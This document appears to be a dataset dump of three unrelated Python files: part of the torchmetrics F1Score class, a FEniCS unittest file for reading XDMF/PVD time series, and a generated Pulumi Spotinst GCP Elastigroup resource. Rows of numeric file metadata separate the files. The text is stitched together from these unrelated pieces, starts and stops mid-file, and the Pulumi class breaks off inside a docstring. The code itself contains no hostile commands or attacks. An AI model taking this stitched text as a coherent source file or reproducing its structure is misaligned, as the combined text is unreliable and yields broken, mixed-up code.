Used only in certain special cases, where you want to treat inputs as a different type
than what they appear to be. See the parameter's
:ref:`documentation section <references/modules:using the multiclass parameter>`
for a more detailed explanation and examples.
compute_on_step:
Forward only calls ``update()`` and return ``None`` if this is set to ``False``.
dist_sync_on_step:
Synchronize metric state across processes at each ``forward()``
before returning the value at the step
process_group:
Specify the process group on which synchronization is called.
default: ``None`` (which selects the entire world)
dist_sync_fn:
Callback that performs the allgather operation on the metric state. When ``None``, DDP
will be used to perform the allgather.
Example:
>>> from torchmetrics import F1Score
>>> target = torch.tensor([0, 1, 2, 0, 1, 2])
>>> preds = torch.tensor([0, 2, 1, 0, 0, 1])
>>> f1 = F1Score(num_classes=3)
>>> f1(preds, target)
tensor(0.3333)
"""
is_differentiable = False
higher_is_better = True
def __init__(
self,
num_classes: Optional[int] = None,
threshold: float = 0.5,
average: str = "micro",
mdmc_average: Optional[str] = None,
ignore_index: Optional[int] = None,
top_k: Optional[int] = None,
multiclass: Optional[bool] = None,
compute_on_step: bool = True,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable = None,
) -> None:
super().__init__(
num_classes=num_classes,
beta=1.0,
threshold=threshold,
average=average,
mdmc_average=mdmc_average,
ignore_index=ignore_index,
top_k=top_k,
multiclass=multiclass,
compute_on_step=compute_on_step,
dist_sync_on_step=dist_sync_on_step,
process_group=process_group,
dist_sync_fn=dist_sync_fn,
)
class F1(F1Score):
"""Computes F1 metric. F1 metrics correspond to a harmonic mean of the precision and recall scores.
.. deprecated:: v0.7
Use :class:`torchmetrics.F1Score`. Will be removed in v0.8.
Example:
>>> from torchmetrics import F1
>>> target = torch.tensor([0, 1, 2, 0, 1, 2])
>>> preds = torch.tensor([0, 2, 1, 0, 0, 1])
>>> f1 = F1(num_classes=3)
>>> f1(preds, target)
tensor(0.3333)
"""
@deprecated(target=F1Score, deprecated_in="0.7", remove_in="0.8", stream=_future_warning)
def __init__(
self,
num_classes: Optional[int] = None,
threshold: float = 0.5,
average: str = "micro",
mdmc_average: Optional[str] = None,
ignore_index: Optional[int] = None,
top_k: Optional[int] = None,
multiclass: Optional[bool] = None,
compute_on_step: bool = True,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable = None,
) -> None:
void(
num_classes,
threshold,
average,
mdmc_average,
ignore_index,
top_k,
multiclass,
compute_on_step,
dist_sync_on_step,
process_group,
dist_sync_fn,
)
| 42.911392
| 112
| 0.618761
| 2,170
| 16,950
| 4.735484
| 0.159447
| 0.014013
| 0.014013
| 0.016349
| 0.812086
| 0.795348
| 0.788926
| 0.78406
| 0.771214
| 0.764402
| 0
| 0.011763
| 0.287788
| 16,950
| 394
| 113
| 43.020305
| 0.839463
| 0.67174
| 0
| 0.73913
| 0
| 0
| 0.021011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036232
| false
| 0
| 0.057971
| 0
| 0.144928
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a63c2ec1b6bd3acde87bb41a4a2691196aa904a
| 7,003
|
py
|
Python
|
test/test_function_reading.py
|
jerabaul29/fenics-calc
|
74c2dc85bf0752fd4944eb37ef8e43b86fbd769e
|
[
"MIT"
] | null | null | null |
test/test_function_reading.py
|
jerabaul29/fenics-calc
|
74c2dc85bf0752fd4944eb37ef8e43b86fbd769e
|
[
"MIT"
] | 1
|
2020-05-14T12:50:32.000Z
|
2020-05-14T12:50:55.000Z
|
test/test_function_reading.py
|
thw1021/fenics-calc
|
383bd21b8fa4478c39b66947609882becf3c1c5a
|
[
"MIT"
] | 1
|
2020-05-13T01:09:19.000Z
|
2020-05-13T01:09:19.000Z
|
from xcalc.timeseries import XDMFTempSeries, PVDTempSeries
from xcalc.function_read import read_vtu_mesh, read_h5_mesh
from dolfin import *
import numpy as np
import unittest
def error(true, me):
mesh = me.function_space().mesh()
return sqrt(abs(assemble(inner(me - true, me - true)*dx(domain=mesh))))
class TestCases(unittest.TestCase):
'''UnitTest for (some of) getting series from VTU/XDMF files'''
try:
import h5py
has_h5py = True
except ImportError:
has_h5py = False
@unittest.skipIf(not has_h5py, 'missing h5py')
def test_xdmf_scalar(self):
mesh = UnitSquareMesh(3, 3)
V = FunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression('x[0]', degree=1), V)
f1 = interpolate(Expression('x[1]', degree=1), V)
with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
f0.rename('f', '0')
out.write(f0, 0.)
f1.rename('f', '0')
out.write(f1, 1.)
# PVDTempSeries('pod_test.pvd', V)
series = XDMFTempSeries('xdmf_test.xdmf', V)
self.assertTrue(error(f0, series[0]) < 1E-14)
self.assertTrue(error(f1, series[1]) < 1E-14)
@unittest.skipIf(not has_h5py, 'missing h5py')
def test_xdmf_vector(self):
mesh = UnitSquareMesh(3, 3)
V = VectorFunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression(('x[0]', 'x[1]'), degree=1), V)
f1 = interpolate(Expression(('2*x[0]', '-3*x[1]'), degree=1), V)
with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
f0.rename('f', '0')
out.write(f0, 0.)
f1.rename('f', '0')
out.write(f1, 1.)
# PVDTempSeries('pod_test.pvd', V)
series = XDMFTempSeries('xdmf_test.xdmf', V)
self.assertTrue(error(f0, series[0]) < 1E-14)
self.assertTrue(error(f1, series[1]) < 1E-14)
@unittest.skipIf(not has_h5py, 'missing h5py')
def test_xdmf_tensor(self):
mesh = UnitSquareMesh(3, 3)
V = TensorFunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression((('x[0]', 'x[1]'), ('x[0]', '-x[1]')), degree=1), V)
f1 = interpolate(Expression((('2*x[0]', '-3*x[1]'), ('4*x[0]', '-3*x[1]')), degree=1), V)
with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
f0.rename('f', '0')
out.write(f0, 0.)
f1.rename('f', '0')
out.write(f1, 1.)
# PVDTempSeries('pod_test.pvd', V)
series = XDMFTempSeries('xdmf_test.xdmf', V)
self.assertTrue(error(f0, series[0]) < 1E-14)
self.assertTrue(error(f1, series[1]) < 1E-14)
@unittest.skipIf(not has_h5py, 'missing h5py')
def test_xdmf_scalar(self):
mesh = UnitSquareMesh(3, 3)
V = FunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression('x[0]', degree=1), V)
f1 = interpolate(Expression('x[1]', degree=1), V)
with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
f0.rename('f', '0')
out.write(f0, 0.)
f1.rename('f', '0')
out.write(f1, 1.)
# PVDTempSeries('pod_test.pvd', V)
series = XDMFTempSeries('xdmf_test.xdmf', V=V.ufl_element())
@unittest.skipIf(not has_h5py, 'missing h5py')
def test_h5_mesh_restored(self):
mesh = UnitSquareMesh(3, 3)
V = FunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression('x[0]', degree=1), V)
f1 = interpolate(Expression('x[1]', degree=1), V)
with XDMFFile(mesh.mpi_comm(), 'xdmf_test.xdmf') as out:
f0.rename('f', '0')
out.write(f0, 0.)
f1.rename('f', '0')
out.write(f1, 1.)
mesh_ = read_h5_mesh('xdmf_test.h5', mesh.ufl_cell())
error = np.linalg.norm(mesh.coordinates() - mesh_.coordinates(), np.inf)
self.assertTrue(error < 1E-14)
error = np.linalg.norm(mesh.cells() - mesh_.cells(), np.inf)
self.assertTrue(error < 1E-14)
# ---
def test_vtu_scalar(self):
mesh = UnitSquareMesh(3, 3)
V = FunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression('x[0]', degree=1), V)
f1 = interpolate(Expression('x[1]', degree=1), V)
out = File('pvd_test.pvd')
f0.rename('f', '0')
out << (f0, 0.)
f1.rename('f', '0')
out << (f1, 1.)
series = PVDTempSeries('pvd_test.pvd', V)
self.assertTrue(error(f0, series[0]) < 1E-14)
self.assertTrue(error(f1, series[1]) < 1E-14)
def test_vtu_vector(self):
mesh = UnitSquareMesh(3, 3)
V = VectorFunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression(('x[0]', 'x[1]'), degree=1), V)
f1 = interpolate(Expression(('2*x[0]', '-3*x[1]'), degree=1), V)
out = File('pvd_test.pvd')
f0.rename('f', '0')
out << (f0, 0.)
f1.rename('f', '0')
out << (f1, 1.)
series = PVDTempSeries('pvd_test.pvd', V)
self.assertTrue(error(f0, series[0]) < 1E-14)
self.assertTrue(error(f1, series[1]) < 1E-14)
def test_vtu_tensor(self):
mesh = UnitSquareMesh(3, 3)
V = TensorFunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression((('x[0]', 'x[1]'), ('2*x[0]', '-3*x[1]')),
degree=1), V)
f1 = interpolate(Expression((('2*x[0]', '-3*x[1]'), ('x[0]', 'x[1]')),
degree=1), V)
out = File('pvd_test.pvd')
f0.rename('f', '0')
out << (f0, 0.)
f1.rename('f', '0')
out << (f1, 1.)
series = PVDTempSeries('pvd_test.pvd', V)
self.assertTrue(error(f0, series[0]) < 1E-14)
self.assertTrue(error(f1, series[1]) < 1E-14)
def test_vtu_mesh_recovery(self):
mesh = UnitSquareMesh(5, 5)
V = FunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression('x[0]', degree=1), V)
f1 = interpolate(Expression('x[1]', degree=1), V)
out = File('pvd_test.pvd')
f0.rename('f', '0')
out << (f0, 0.)
mesh_ = read_vtu_mesh('pvd_test000000.vtu', mesh.ufl_cell())
error = np.linalg.norm(mesh.coordinates() - mesh_.coordinates(), np.inf)
self.assertTrue(error < 1E-14)
error = np.linalg.norm(mesh.cells() - mesh_.cells(), np.inf)
self.assertTrue(error < 1E-14)
def test_vtu_scalar_restored(self):
mesh = UnitSquareMesh(3, 3)
V = FunctionSpace(mesh, 'CG', 1)
f0 = interpolate(Expression('x[0]', degree=1), V)
f1 = interpolate(Expression('x[1]', degree=1), V)
out = File('pvd_test.pvd')
f0.rename('f', '0')
out << (f0, 0.)
f1.rename('f', '0')
out << (f1, 1.)
series = PVDTempSeries('pvd_test.pvd', V=V.ufl_element())
self.assertTrue(error(f0, series[0]) < 1E-14)
self.assertTrue(error(f1, series[1]) < 1E-14)
| 33.033019
| 97
| 0.540625
| 938
| 7,003
| 3.952026
| 0.101279
| 0.113299
| 0.043162
| 0.05638
| 0.870245
| 0.870245
| 0.870245
| 0.870245
| 0.870245
| 0.857297
| 0
| 0.059231
| 0.279166
| 7,003
| 211
| 98
| 33.189573
| 0.675119
| 0.027702
| 0
| 0.794702
| 0
| 0
| 0.081984
| 0
| 0
| 0
| 0
| 0
| 0.119205
| 1
| 0.072848
| false
| 0
| 0.046358
| 0
| 0.13245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ab5fe2f3da88d15101f855927dbfd27ae8336f9
| 29,805
|
py
|
Python
|
sdk/python/pulumi_spotinst/gcp/elastigroup.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/gcp/elastigroup.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/gcp/elastigroup.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Elastigroup(pulumi.CustomResource):
auto_healing: pulumi.Output[bool]
availability_zones: pulumi.Output[list]
"""
List of availability zones for the group.
"""
backend_services: pulumi.Output[list]
description: pulumi.Output[str]
"""
The region your GCP group will be created in.
"""
desired_capacity: pulumi.Output[float]
"""
The desired number of instances the group should have at any time.
"""
disks: pulumi.Output[list]
draining_timeout: pulumi.Output[float]
"""
Time (seconds) the instance is allowed to run after it is detached from the group. This is to allow the instance time to drain all the current TCP connections before terminating it.
"""
fallback_to_ondemand: pulumi.Output[bool]
"""
Activate fallback-to-on-demand. When provisioning an instance, if no Preemptible market is available, fallback-to-on-demand will provision an On-Demand instance to maintain the group capacity.
"""
gpu: pulumi.Output[list]
health_check_grace_period: pulumi.Output[float]
health_check_type: pulumi.Output[str]
instance_types_customs: pulumi.Output[list]
"""
Defines a set of custom instance types. Required if instance_types_preemptible and instance_types_ondemand are not set.
* `memoryGib` (`float`) - The memory (in GiB) in the custom instance types. GCP has a number of limitations on accepted memory values.For more information, see the GCP documentation (here.)[https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#specifications]
* `vcpu` (`float`)
"""
instance_types_ondemand: pulumi.Output[str]
"""
The regular VM instance type to use for mixed-type groups and when falling back to on-demand. Required if instance_types_preemptible is not set.
"""
instance_types_preemptibles: pulumi.Output[list]
"""
The preemptible VMs instance type. To maximize cost savings and market availability, select as many types as possible. Required if instance_types_ondemand is not set.
"""
integration_docker_swarm: pulumi.Output[dict]
integration_gke: pulumi.Output[dict]
ip_forwarding: pulumi.Output[bool]
labels: pulumi.Output[list]
"""
Array of objects with key-value pairs.
* `key` (`str`) - Labels key.
* `value` (`str`) - Labels value.
"""
max_size: pulumi.Output[float]
"""
The maximum number of instances the group should have at any time.
"""
metadatas: pulumi.Output[list]
"""
Array of objects with key-value pairs.
* `key` (`str`) - Labels key.
* `value` (`str`) - Labels value.
"""
min_size: pulumi.Output[float]
"""
The minimum number of instances the group should have at any time.
"""
name: pulumi.Output[str]
"""
The group name.
"""
network_interfaces: pulumi.Output[list]
ondemand_count: pulumi.Output[float]
preemptible_percentage: pulumi.Output[float]
"""
Percentage of Preemptible VMs to spin up from the "desired_capacity".
"""
scaling_down_policies: pulumi.Output[list]
scaling_up_policies: pulumi.Output[list]
scheduled_tasks: pulumi.Output[list]
service_account: pulumi.Output[str]
"""
The email of the service account in which the group instances will be launched.
"""
shutdown_script: pulumi.Output[str]
"""
The Base64-encoded shutdown script that executes prior to instance termination, for more information please see: [Shutdown Script](https://api.spotinst.com/integration-docs/elastigroup/concepts/compute-concepts/shutdown-scripts/)
"""
startup_script: pulumi.Output[str]
"""
Create and run your own startup scripts on your virtual machines to perform automated tasks every time your instance boots up.
"""
subnets: pulumi.Output[list]
"""
A list of regions and subnets.
* `region` (`str`) - The region for the group of subnets.
* `subnetNames` (`list`) - The names of the subnets in the region.
"""
tags: pulumi.Output[list]
"""
Tags to mark created instances.
"""
unhealthy_duration: pulumi.Output[float]
def __init__(__self__, resource_name, opts=None, auto_healing=None, availability_zones=None, backend_services=None, description=None, desired_capacity=None, disks=None, draining_timeout=None, fallback_to_ondemand=None, gpu=None, health_check_grace_period=None, health_check_type=None, instance_types_customs=None, instance_types_ondemand=None, instance_types_preemptibles=None, integration_docker_swarm=None, integration_gke=None, ip_forwarding=None, labels=None, max_size=None, metadatas=None, min_size=None, name=None, network_interfaces=None, ondemand_count=None, preemptible_percentage=None, scaling_down_policies=None, scaling_up_policies=None, scheduled_tasks=None, service_account=None, shutdown_script=None, startup_script=None, subnets=None, tags=None, unhealthy_duration=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a Spotinst elastigroup GCP resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] availability_zones: List of availability zones for the group.
:param pulumi.Input[str] description: The region your GCP group will be created in.
:param pulumi.Input[float] desired_capacity: The desired number of instances the group should have at any time.
:param pulumi.Input[float] draining_timeout: Time (seconds) the instance is allowed to run after it is detached from the group. This is to allow the instance time to drain all the current TCP connections before terminating it.
:param pulumi.Input[bool] fallback_to_ondemand: Activate fallback-to-on-demand. When provisioning an instance, if no Preemptible market is available, fallback-to-on-demand will provision an On-Demand instance to maintain the group capacity.
:param pulumi.Input[list] instance_types_customs: Defines a set of custom instance types. Required if instance_types_preemptible and instance_types_ondemand are not set.
:param pulumi.Input[str] instance_types_ondemand: The regular VM instance type to use for mixed-type groups and when falling back to on-demand. Required if instance_types_preemptible is not set.
:param pulumi.Input[list] instance_types_preemptibles: The preemptible VMs instance type. To maximize cost savings and market availability, select as many types as possible. Required if instance_types_ondemand is not set.
:param pulumi.Input[list] labels: Array of objects with key-value pairs.
:param pulumi.Input[float] max_size: The maximum number of instances the group should have at any time.
:param pulumi.Input[list] metadatas: Array of objects with key-value pairs.
:param pulumi.Input[float] min_size: The minimum number of instances the group should have at any time.
:param pulumi.Input[str] name: The group name.
:param pulumi.Input[float] preemptible_percentage: Percentage of Preemptible VMs to spin up from the "desired_capacity".
:param pulumi.Input[str] service_account: The email of the service account in which the group instances will be launched.
:param pulumi.Input[str] shutdown_script: The Base64-encoded shutdown script that executes prior to instance termination, for more information please see: [Shutdown Script](https://api.spotinst.com/integration-docs/elastigroup/concepts/compute-concepts/shutdown-scripts/)
:param pulumi.Input[str] startup_script: Create and run your own startup scripts on your virtual machines to perform automated tasks every time your instance boots up.
:param pulumi.Input[list] subnets: A list of regions and subnets.
:param pulumi.Input[list] tags: Tags to mark created instances.
The **backend_services** object supports the following:
* `locationType` (`pulumi.Input[str]`)
* `namedPorts` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `ports` (`pulumi.Input[list]`)
* `scheme` (`pulumi.Input[str]`)
* `serviceName` (`pulumi.Input[str]`)
The **disks** object supports the following:
* `autoDelete` (`pulumi.Input[bool]`)
* `boot` (`pulumi.Input[bool]`)
* `deviceName` (`pulumi.Input[str]`)
* `initializeParams` (`pulumi.Input[list]`)
* `diskSizeGb` (`pulumi.Input[str]`)
* `diskType` (`pulumi.Input[str]`)
* `sourceImage` (`pulumi.Input[str]`)
* `interface` (`pulumi.Input[str]`)
* `mode` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `type` (`pulumi.Input[str]`)
The **gpu** object supports the following:
* `count` (`pulumi.Input[float]`)
* `type` (`pulumi.Input[str]`)
The **instance_types_customs** object supports the following:
* `memoryGib` (`pulumi.Input[float]`) - The memory (in GiB) in the custom instance types. GCP has a number of limitations on accepted memory values.For more information, see the GCP documentation (here.)[https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#specifications]
* `vcpu` (`pulumi.Input[float]`)
The **integration_docker_swarm** object supports the following:
* `masterHost` (`pulumi.Input[str]`)
* `masterPort` (`pulumi.Input[float]`)
The **integration_gke** object supports the following:
* `autoUpdate` (`pulumi.Input[bool]`)
* `autoscaleCooldown` (`pulumi.Input[float]`)
* `autoscaleDown` (`pulumi.Input[dict]`)
* `evaluationPeriods` (`pulumi.Input[float]`)
* `autoscaleHeadroom` (`pulumi.Input[dict]`)
* `cpuPerUnit` (`pulumi.Input[float]`)
* `memoryPerUnit` (`pulumi.Input[float]`)
* `numOfUnits` (`pulumi.Input[float]`)
* `autoscaleIsAutoConfig` (`pulumi.Input[bool]`)
* `autoscaleIsEnabled` (`pulumi.Input[bool]`)
* `autoscaleLabels` (`pulumi.Input[list]`)
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
* `cluster_id` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`)
The **labels** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **metadatas** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **network_interfaces** object supports the following:
* `accessConfigs` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `type` (`pulumi.Input[str]`)
* `aliasIpRanges` (`pulumi.Input[list]`)
* `ipCidrRange` (`pulumi.Input[str]`)
* `subnetworkRangeName` (`pulumi.Input[str]`)
* `network` (`pulumi.Input[str]`)
The **scaling_down_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scaling_up_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scheduled_tasks** object supports the following:
* `cronExpression` (`pulumi.Input[str]`)
* `isEnabled` (`pulumi.Input[bool]`)
* `maxCapacity` (`pulumi.Input[str]`)
* `minCapacity` (`pulumi.Input[str]`)
* `targetCapacity` (`pulumi.Input[str]`)
* `taskType` (`pulumi.Input[str]`)
The **subnets** object supports the following:
* `region` (`pulumi.Input[str]`) - The region for the group of subnets.
* `subnetNames` (`pulumi.Input[list]`) - The names of the subnets in the region.
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/elastigroup_gcp.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['auto_healing'] = auto_healing
__props__['availability_zones'] = availability_zones
__props__['backend_services'] = backend_services
__props__['description'] = description
if desired_capacity is None:
raise TypeError("Missing required property 'desired_capacity'")
__props__['desired_capacity'] = desired_capacity
__props__['disks'] = disks
__props__['draining_timeout'] = draining_timeout
__props__['fallback_to_ondemand'] = fallback_to_ondemand
__props__['gpu'] = gpu
__props__['health_check_grace_period'] = health_check_grace_period
__props__['health_check_type'] = health_check_type
__props__['instance_types_customs'] = instance_types_customs
__props__['instance_types_ondemand'] = instance_types_ondemand
__props__['instance_types_preemptibles'] = instance_types_preemptibles
__props__['integration_docker_swarm'] = integration_docker_swarm
__props__['integration_gke'] = integration_gke
__props__['ip_forwarding'] = ip_forwarding
__props__['labels'] = labels
__props__['max_size'] = max_size
__props__['metadatas'] = metadatas
__props__['min_size'] = min_size
__props__['name'] = name
__props__['network_interfaces'] = network_interfaces
__props__['ondemand_count'] = ondemand_count
__props__['preemptible_percentage'] = preemptible_percentage
__props__['scaling_down_policies'] = scaling_down_policies
__props__['scaling_up_policies'] = scaling_up_policies
__props__['scheduled_tasks'] = scheduled_tasks
__props__['service_account'] = service_account
__props__['shutdown_script'] = shutdown_script
__props__['startup_script'] = startup_script
__props__['subnets'] = subnets
__props__['tags'] = tags
__props__['unhealthy_duration'] = unhealthy_duration
super(Elastigroup, __self__).__init__(
'spotinst:gcp/elastigroup:Elastigroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, auto_healing=None, availability_zones=None, backend_services=None, description=None, desired_capacity=None, disks=None, draining_timeout=None, fallback_to_ondemand=None, gpu=None, health_check_grace_period=None, health_check_type=None, instance_types_customs=None, instance_types_ondemand=None, instance_types_preemptibles=None, integration_docker_swarm=None, integration_gke=None, ip_forwarding=None, labels=None, max_size=None, metadatas=None, min_size=None, name=None, network_interfaces=None, ondemand_count=None, preemptible_percentage=None, scaling_down_policies=None, scaling_up_policies=None, scheduled_tasks=None, service_account=None, shutdown_script=None, startup_script=None, subnets=None, tags=None, unhealthy_duration=None):
"""
Get an existing Elastigroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] availability_zones: List of availability zones for the group.
:param pulumi.Input[str] description: The region your GCP group will be created in.
:param pulumi.Input[float] desired_capacity: The desired number of instances the group should have at any time.
:param pulumi.Input[float] draining_timeout: Time (seconds) the instance is allowed to run after it is detached from the group. This is to allow the instance time to drain all the current TCP connections before terminating it.
:param pulumi.Input[bool] fallback_to_ondemand: Activate fallback-to-on-demand. When provisioning an instance, if no Preemptible market is available, fallback-to-on-demand will provision an On-Demand instance to maintain the group capacity.
:param pulumi.Input[list] instance_types_customs: Defines a set of custom instance types. Required if instance_types_preemptible and instance_types_ondemand are not set.
:param pulumi.Input[str] instance_types_ondemand: The regular VM instance type to use for mixed-type groups and when falling back to on-demand. Required if instance_types_preemptible is not set.
:param pulumi.Input[list] instance_types_preemptibles: The preemptible VMs instance type. To maximize cost savings and market availability, select as many types as possible. Required if instance_types_ondemand is not set.
:param pulumi.Input[list] labels: Array of objects with key-value pairs.
:param pulumi.Input[float] max_size: The maximum number of instances the group should have at any time.
:param pulumi.Input[list] metadatas: Array of objects with key-value pairs.
:param pulumi.Input[float] min_size: The minimum number of instances the group should have at any time.
:param pulumi.Input[str] name: The group name.
:param pulumi.Input[float] preemptible_percentage: Percentage of Preemptible VMs to spin up from the "desired_capacity".
:param pulumi.Input[str] service_account: The email of the service account in which the group instances will be launched.
:param pulumi.Input[str] shutdown_script: The Base64-encoded shutdown script that executes prior to instance termination, for more information please see: [Shutdown Script](https://api.spotinst.com/integration-docs/elastigroup/concepts/compute-concepts/shutdown-scripts/)
:param pulumi.Input[str] startup_script: Create and run your own startup scripts on your virtual machines to perform automated tasks every time your instance boots up.
:param pulumi.Input[list] subnets: A list of regions and subnets.
:param pulumi.Input[list] tags: Tags to mark created instances.
The **backend_services** object supports the following:
* `locationType` (`pulumi.Input[str]`)
* `namedPorts` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `ports` (`pulumi.Input[list]`)
* `scheme` (`pulumi.Input[str]`)
* `serviceName` (`pulumi.Input[str]`)
The **disks** object supports the following:
* `autoDelete` (`pulumi.Input[bool]`)
* `boot` (`pulumi.Input[bool]`)
* `deviceName` (`pulumi.Input[str]`)
* `initializeParams` (`pulumi.Input[list]`)
* `diskSizeGb` (`pulumi.Input[str]`)
* `diskType` (`pulumi.Input[str]`)
* `sourceImage` (`pulumi.Input[str]`)
* `interface` (`pulumi.Input[str]`)
* `mode` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `type` (`pulumi.Input[str]`)
The **gpu** object supports the following:
* `count` (`pulumi.Input[float]`)
* `type` (`pulumi.Input[str]`)
The **instance_types_customs** object supports the following:
* `memoryGib` (`pulumi.Input[float]`) - The memory (in GiB) in the custom instance types. GCP has a number of limitations on accepted memory values.For more information, see the GCP documentation (here.)[https://cloud.google.com/compute/docs/instances/creating-instance-with-custom-machine-type#specifications]
* `vcpu` (`pulumi.Input[float]`)
The **integration_docker_swarm** object supports the following:
* `masterHost` (`pulumi.Input[str]`)
* `masterPort` (`pulumi.Input[float]`)
The **integration_gke** object supports the following:
* `autoUpdate` (`pulumi.Input[bool]`)
* `autoscaleCooldown` (`pulumi.Input[float]`)
* `autoscaleDown` (`pulumi.Input[dict]`)
* `evaluationPeriods` (`pulumi.Input[float]`)
* `autoscaleHeadroom` (`pulumi.Input[dict]`)
* `cpuPerUnit` (`pulumi.Input[float]`)
* `memoryPerUnit` (`pulumi.Input[float]`)
* `numOfUnits` (`pulumi.Input[float]`)
* `autoscaleIsAutoConfig` (`pulumi.Input[bool]`)
* `autoscaleIsEnabled` (`pulumi.Input[bool]`)
* `autoscaleLabels` (`pulumi.Input[list]`)
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
* `cluster_id` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`)
The **labels** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **metadatas** object supports the following:
* `key` (`pulumi.Input[str]`) - Labels key.
* `value` (`pulumi.Input[str]`) - Labels value.
The **network_interfaces** object supports the following:
* `accessConfigs` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `type` (`pulumi.Input[str]`)
